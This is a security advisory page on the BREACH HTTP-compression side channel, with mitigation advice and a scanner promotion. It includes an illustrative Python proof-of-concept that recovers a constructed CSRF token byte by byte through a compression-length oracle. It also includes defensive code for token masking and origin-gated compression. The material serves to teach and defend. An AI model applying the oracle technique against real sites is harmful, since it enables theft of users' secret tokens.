BREACH attack

Severity:
Low

Description

BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) is a variant of the CRIME attack. Where CRIME targeted TLS-level compression, BREACH targets HTTP-level compression of the response body, that is, gzip or DEFLATE selected through the Content-Encoding header. TLS does not hide this: the ciphertext length tracks the compressed length, whatever the TLS version or cipher suite. A page is exploitable when three conditions hold together: it is served compressed, it reflects attacker-controlled input (for example a query parameter) into the body, and the same body carries a static secret, typically a CSRF token. Session cookies travel in request and response headers, which HTTP compression does not cover, so they are at risk only where the application echoes them into the body. Because DEFLATE replaces repeated byte sequences with back-references, a reflected guess that shares a longer prefix with the secret produces a slightly shorter response. An attacker who can make the victim's browser issue many such requests (for example from a cross-site page) and observe the ciphertext lengths on the network uses this compression oracle to recover the secret one character at a time, with a brute-force or divide-and-conquer search over the alphabet at each position. The attack threatens confidentiality, and an extracted CSRF token or similar secret can lead to the compromise of sensitive data.
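The following Python script is an added illustration of the oracle described above; it is not part of this advisory and not SmartScanner's code. It constructs a toy page that reflects request input next to a CSRF token, measures the compressed body size with zlib (the attacker's only observable), and recovers the token byte by byte using the two-tries comparison from the BREACH paper. The page markup, the token value, the hex alphabet and the padding strings are assumptions made for the example.

```python
import zlib

# Constructed example values (assumptions, not taken from the advisory): a hex CSRF
# token embedded in the HTML body and the alphabet the attacker searches over.
SECRET_TOKEN = "7f3a9c1e"
HEX = "0123456789abcdef"
KNOWN_PREFIX = "value='"   # markup the attacker already knows precedes the token

# Trailing paddings (characters absent from the page and the token) shift the byte
# alignment of the DEFLATE bit stream so a sub-byte saving shows up as a whole byte.
PADDINGS = ["", "[", "[]", "[]^", "[]^_", "[]^_`", "[]^_`|", "[]^_`|;"]


def render_page(reflected: str) -> bytes:
    """Constructed vulnerable page: echoes request input into the same body that
    carries the secret, and that body is what Content-Encoding compresses."""
    return (
        "<html><body>"
        f"<p>You searched for: {reflected}</p>"
        f"<form><input type='hidden' name='csrf' value='{SECRET_TOKEN}'></form>"
        "</body></html>"
    ).encode()


def compressed_size(reflected: str) -> int:
    """The attacker's only observable: length of the compressed body (TLS does not
    hide it, because ciphertext length tracks plaintext length)."""
    return len(zlib.compress(render_page(reflected)))


def oracle_gap(correct: str, wrong: str) -> int:
    """Whole-token view of the oracle: a reflection equal to the secret is absorbed
    into one LZ77 back-reference, a wrong one costs every byte as a literal."""
    return (compressed_size(KNOWN_PREFIX + wrong + "'")
            - compressed_size(KNOWN_PREFIX + correct + "'"))


def two_tries_score(known: str, guess: str) -> int:
    """Two-tries oracle from the BREACH paper. 'known+guess+filler' and
    'known+filler+guess' contain exactly the same bytes, so their Huffman tables are
    identical and only the LZ77 match against the secret can differ: the first
    variant is shorter only when guess extends the correct prefix. A wrong guess
    scores 0; a correct one normally scores positive for at least one padding."""
    score = 0
    for pad in PADDINGS:
        aligned = compressed_size(known + guess + "{}" + pad)
        shifted = compressed_size(known + "{}" + guess + pad)
        score += shifted - aligned
    return score


def recover_token(length: int = len(SECRET_TOKEN), alphabet: str = HEX) -> str:
    """Byte-by-byte brute force: try every alphabet character at the next position
    and keep the one the oracle singles out. Returns what was recovered so far if
    the oracle gives no signal at some position (a real attack would retry with
    different padding or split the alphabet, i.e. divide and conquer)."""
    recovered = ""
    for _ in range(length):
        scores = {c: two_tries_score(KNOWN_PREFIX + recovered, c) for c in alphabet}
        best = max(scores, key=scores.get)
        if scores[best] <= 0:
            break
        recovered += best
    return recovered


if __name__ == "__main__":
    print("bytes saved by the right whole token:", oracle_gap(SECRET_TOKEN, "01234567"))
    print("recovered:", recover_token(), "actual:", SECRET_TOKEN)
```

The whole-token gap is several bytes and easy to see; the per-character signal is at most one literal's worth of bits, which is why the script compares two orderings of the same bytes and sums over several paddings instead of trusting a single length measurement. Against a real target the same measurements are taken from TLS record sizes on the wire, and the request count is what rate limiting can make expensive.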

Test for BREACH vulnerability with SmartScanner

Download FREE!

Recommendation

To mitigate BREACH, disable HTTP compression, either entirely or selectively on responses that carry secrets such as CSRF tokens (session cookies matter only where the application echoes them into the body). Where compression must stay on, remove the other preconditions of the attack instead: do not reflect user-controlled input into the same response as a secret, and randomize or mask the secret on every response so that repeated guesses have no stable target to compress against (the approach frameworks such as Django and Rails take for CSRF tokens). Implement CSRF protection as an additional layer: a reflecting request that itself requires a valid token cannot be triggered from a cross-site page. Finally, consider disabling compression when the Referer header indicates a cross-site request or is absent; where the browser sends the Sec-Fetch-Site header it gives the same signal more reliably than Referer. Changing cipher suites or TLS versions does not help, since it is the body compression, not TLS, that leaks the length.
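As an added example (not part of this advisory and not SmartScanner's or any framework's code), the Python below implements two of the recommendations above for a single page: compression is gated on request provenance, using Sec-Fetch-Site when present and otherwise the Referer rule from the recommendation, and the CSRF token is masked with a fresh random pad on every response, the technique frameworks such as Django and Rails use. The origin `https://app.example`, the page markup and the header set are assumptions.

```python
import gzip
import html
import re
import secrets
from urllib.parse import urlsplit

# Assumption: the application's own origin; requests that cannot be shown to come
# from it are served uncompressed.
SITE_ORIGIN = "https://app.example"


def should_compress(request_headers: dict) -> bool:
    """Gate HTTP compression on request provenance. BREACH needs the victim's
    browser to issue many requests from an attacker-controlled context, so compress
    only requests that are demonstrably same-origin. Sec-Fetch-Site is preferred
    when the browser sends it; otherwise fall back to Referer, and treat a missing
    Referer as untrusted."""
    h = {k.lower(): v for k, v in request_headers.items()}
    fetch_site = h.get("sec-fetch-site")
    if fetch_site is not None:
        # 'none' is a user-initiated navigation (address bar, bookmark), which a
        # cross-site page cannot forge; 'same-site' is deliberately excluded so a
        # compromised sibling subdomain gets no oracle either.
        return fetch_site in ("same-origin", "none")
    referer = h.get("referer")
    if not referer:
        return False
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def mask_token(secret: bytes) -> bytes:
    """Per-response masking: emit mask || (secret XOR mask) with a fresh random
    mask, so the token bytes in the body change on every response and a reflected
    guess never has a stable target to compress against."""
    mask = secrets.token_bytes(len(secret))
    return mask + bytes(s ^ m for s, m in zip(secret, mask))


def unmask_token(masked: bytes) -> bytes:
    """Server side on form submit: strip the mask and recover the real token."""
    half = len(masked) // 2
    mask, body = masked[:half], masked[half:]
    return bytes(b ^ m for b, m in zip(body, mask))


def render(request_headers: dict, reflected: str, csrf_secret: bytes) -> tuple:
    """Build the page with a freshly masked token, compress only when allowed, and
    declare the dependency on request headers so shared caches keep variants apart."""
    token_hex = mask_token(csrf_secret).hex()
    body = (
        "<html><body>"
        f"<p>You searched for: {html.escape(reflected)}</p>"   # escaping is XSS hygiene, unrelated to BREACH
        f"<form><input type='hidden' name='csrf' value='{token_hex}'></form>"
        "</body></html>"
    ).encode()
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Vary": "Accept-Encoding, Referer, Sec-Fetch-Site",
    }
    if should_compress(request_headers):
        headers["Content-Encoding"] = "gzip"
        body = gzip.compress(body)
    return headers, body


def decode_body(headers: dict, body: bytes) -> bytes:
    """What the browser does with the response: undo Content-Encoding if present."""
    return gzip.decompress(body) if headers.get("Content-Encoding") == "gzip" else body


def token_from_body(body: bytes) -> bytes:
    """Pull the masked token back out of the HTML, as a form submission would."""
    found = re.search(rb"name='csrf' value='([0-9a-f]+)'", body)
    return bytes.fromhex(found.group(1).decode())


if __name__ == "__main__":
    secret = secrets.token_bytes(16)
    for hdrs in ({}, {"Referer": "https://evil.example/"}, {"Sec-Fetch-Site": "same-origin"}):
        resp_headers, resp_body = render(hdrs, "q", secret)
        print(hdrs, "->", resp_headers.get("Content-Encoding", "identity"))
        print("token round-trips:", unmask_token(token_from_body(decode_body(resp_headers, resp_body))) == secret)
```

Masking alone already removes the oracle for the token, because the bytes the attacker would have to match differ on every response; the compression gate is the belt to that suspenders, and also protects any other secret in the body. Note the Vary header: once the compression decision depends on Referer or Sec-Fetch-Site, a shared cache that ignores that dependency could hand a compressed copy to a cross-site request, and in practice Vary: Referer makes the page effectively uncacheable, which is a cost to weigh against simply not compressing it.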

Tags:
BREACH
CRIME
CSRF
SSL/TLS
Encryption
Server Misconfiguration
Last updated on May 13, 2024
